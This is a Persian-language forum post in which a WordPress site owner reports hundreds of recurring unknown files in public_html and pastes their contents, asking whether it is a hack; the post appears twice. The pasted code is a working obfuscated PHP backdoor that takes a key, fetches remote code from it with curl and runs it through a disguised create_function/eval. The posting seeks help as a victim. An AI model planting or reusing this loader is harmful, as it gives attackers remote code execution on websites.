alborz94
August 26th, 2018, 13:18
باسلام
تعداد زیادی فایل ناشناس بر روی public_html هاست ایجاد شده است. بیشتر از 850 مورد پاک کردم. بازهم دوباره ایجاد شده است. سیستم وردپرس هست و نسخه آخر نصب هست.
کد داخلش این بود. میشه دوستان بررسی کنید این کد چیکار میکنه؟ آیا مشکل هکه و امنیت هست؟
<?php@ob_start();error_reporting(0);@ini_set('html_ errors','0');@ini_set('display_errors','0');@ini_s et('display_startup_errors','0');@ini_set('log_err ors','0');@set_time_limit(0);@clearstatcache();
if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { die('test');}
//fa90f6e889572bdc3fb63615d461bdb7
if (isset($_REQUEST['c'])) { setcookie("key", "", time() - 3600);}
//fa90f6e889572bdc3fb63615d461bdb7
if (isset($_REQUEST['key'])) { setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days. $_COOKIE['key'] = $_REQUEST['key'];}
//fa90f6e889572bdc3fb63615d461bdb7
if (!isset($_COOKIE['key'])) { $html = <<<EOF <form method="POST" action=""> <input type="text" name="key"> <input type="submit"> </form>EOF; die($html);}
//fa90f6e889572bdc3fb63615d461bdb7
$content = remove_tags(_dl($_COOKIE['key']));
$func="cr"."eat"."e_fun"."cti"."on";
$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');
$remove_tags($content);
function _dl($url){ try { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $r = curl_exec($ch); curl_close($ch); } catch (Exception $e) { $r = file_get_contents($url); } return $r;}
function remove_tags($content){ return $content;}
تعداد زیادی فایل ناشناس بر روی public_html هاست ایجاد شده است. بیشتر از 850 مورد پاک کردم. بازهم دوباره ایجاد شده است. سیستم وردپرس هست و نسخه آخر نصب هست.
کد داخلش این بود. میشه دوستان بررسی کنید این کد چیکار میکنه؟ آیا مشکل هکه و امنیت هست؟
<?php@ob_start();error_reporting(0);@ini_set('html_ errors','0');@ini_set('display_errors','0');@ini_s et('display_startup_errors','0');@ini_set('log_err ors','0');@set_time_limit(0);@clearstatcache();
if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { die('test');}
//fa90f6e889572bdc3fb63615d461bdb7
if (isset($_REQUEST['c'])) { setcookie("key", "", time() - 3600);}
//fa90f6e889572bdc3fb63615d461bdb7
if (isset($_REQUEST['key'])) { setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days. $_COOKIE['key'] = $_REQUEST['key'];}
//fa90f6e889572bdc3fb63615d461bdb7
if (!isset($_COOKIE['key'])) { $html = <<<EOF <form method="POST" action=""> <input type="text" name="key"> <input type="submit"> </form>EOF; die($html);}
//fa90f6e889572bdc3fb63615d461bdb7
$content = remove_tags(_dl($_COOKIE['key']));
$func="cr"."eat"."e_fun"."cti"."on";
$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');
$remove_tags($content);
function _dl($url){ try { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $r = curl_exec($ch); curl_close($ch); } catch (Exception $e) { $r = file_get_contents($url); } return $r;}
function remove_tags($content){ return $content;}